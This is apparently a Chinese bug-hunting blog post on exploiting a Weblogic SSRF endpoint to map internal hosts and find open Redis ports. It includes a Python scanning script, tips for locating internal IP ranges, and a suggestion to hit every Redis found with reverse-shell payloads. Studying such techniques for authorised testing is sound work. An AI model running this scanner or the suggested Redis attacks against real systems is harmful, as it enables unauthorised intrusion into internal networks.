• 欢迎访问挑战自我博客网站,安全研究,web渗透,推荐使用最新版火狐浏览器和Chrome浏览器访问本网站,欢迎加入挑战自我博客网站 网站主页

Weblogic SSRF漏洞测试

挖洞经验 挑战自我 4465次浏览 已收录 0个评论

1、文章简介

本文主要是针对Weblogic SSRF漏洞的利用测试方法,SSRF在很多大厂商都还是比较重视的,有一些厂商这里就不多说了,低危漏洞让你直接死心,沟通起来也费尽!今天这里主要写一下利用SSRF漏洞探测内网的redis 6379端口的方法。经过多次 fuzz 测试总结了一条较稳定探测的方法,当然并不是百分百可用,还要看目标的网络环境。

2、SSRF探测原理

2.1、http协议探测

先SSRF访问如下内网地址,具体的根据你自己的测试环境定:

http://10.10.10.10:6379

如果在正常时间内给你响应,证明这个IP是存活的,如果超时了就不存活就没必要继续了

2.2、https协议探测

假设IP是存活的,接着SSRF访问:

https://10.10.10.10:6379

如果在正常时间内给你响应,证明该存活IP没有开放6379端口,如果一直等待到超时证明开放了6379端口

2.3、简单测试代码

#!/usr/bin/python
# -*- coding: utf-8 -*-
 
import httplib
import  time
from colorama import init,Fore
init(autoreset=True)
ips = ['10.10.120.']
for j in ips:
    for i in range(1,255):
        try:
            print Fore.BLUE+'[-]Check '+j+str(i)
            conn = httplib.HTTPSConnection('xx.bbbb.com',80,timeout=5)
            conn.request(method="GET",url="/uddiexplorer/SearchPublicRegistries.jsp?operator=http://"+j+str(i)+\
                        ":6379&rdoSearch=name&txtSearchname=sdf&txtSearchkey=&txtSearchfor=&selfor=Business+location&btnSubmit=Search")
            conn.getresponse().read()
            conn.close()
            try:
                conn = httplib.HTTPSConnection('xx.bbbb.com',80,timeout=5)
                conn.request(method="GET",url="/uddiexplorer/SearchPublicRegistries.jsp?operator=https://"+j+str(i)+\
                            ":6379&rdoSearch=name&txtSearchname=sdf&txtSearchkey=&txtSearchfor=&selfor=Business+location&btnSubmit=Search")
                conn.getresponse().read()
                conn.close()
                time.sleep(4)
            except:
                print Fore.RED+'[+] '+j+str(i)+':6379 is open'
                time.sleep(4)
        except:
            time.sleep(4)

3、寻找内网IP网段

1、域名解析没有内外网隔离可以爆破出一些内网 IP
2、Github上搜索对于较大的厂商找出内网信息的几率会很大
3、可以把扫到的子域名过一遍敏感信息扫描,从中找出泄露的内网信息
4、还可以去逛一圈各大漏洞平台如某云的镜像站搜索历史漏洞

4、SSRF深入利用

4.1、header CRLF 注入

Weblogic 支持 header CRLF 注入所以 payload 构造,具体payload可以自己查

4.2、其他测试建议

这里再说一个redis的语句

debug sleep 5 表示延迟 5 秒

如果你想获得一步一步慢慢深入的快感的话,我推荐用这个语句来判断一下目标 redis 是否是未授权访问,当然你嫌麻烦的话直接把扫出的 redis 全怼一遍反弹 payload 也是可以的


挑战自我博客, 版权所有丨如未注明 , 均为原创丨本网站采用BY-NC-SA协议进行授权 , 转载请注明Weblogic SSRF漏洞测试
喜欢 (11)
支付宝[]
分享 (0)
发表我的评论
取消评论
表情 贴图 加粗 删除线 居中 斜体 签到

Hi,您需要填写昵称和邮箱!

  • 昵称 (必填)
  • 邮箱 (必填)
  • 网址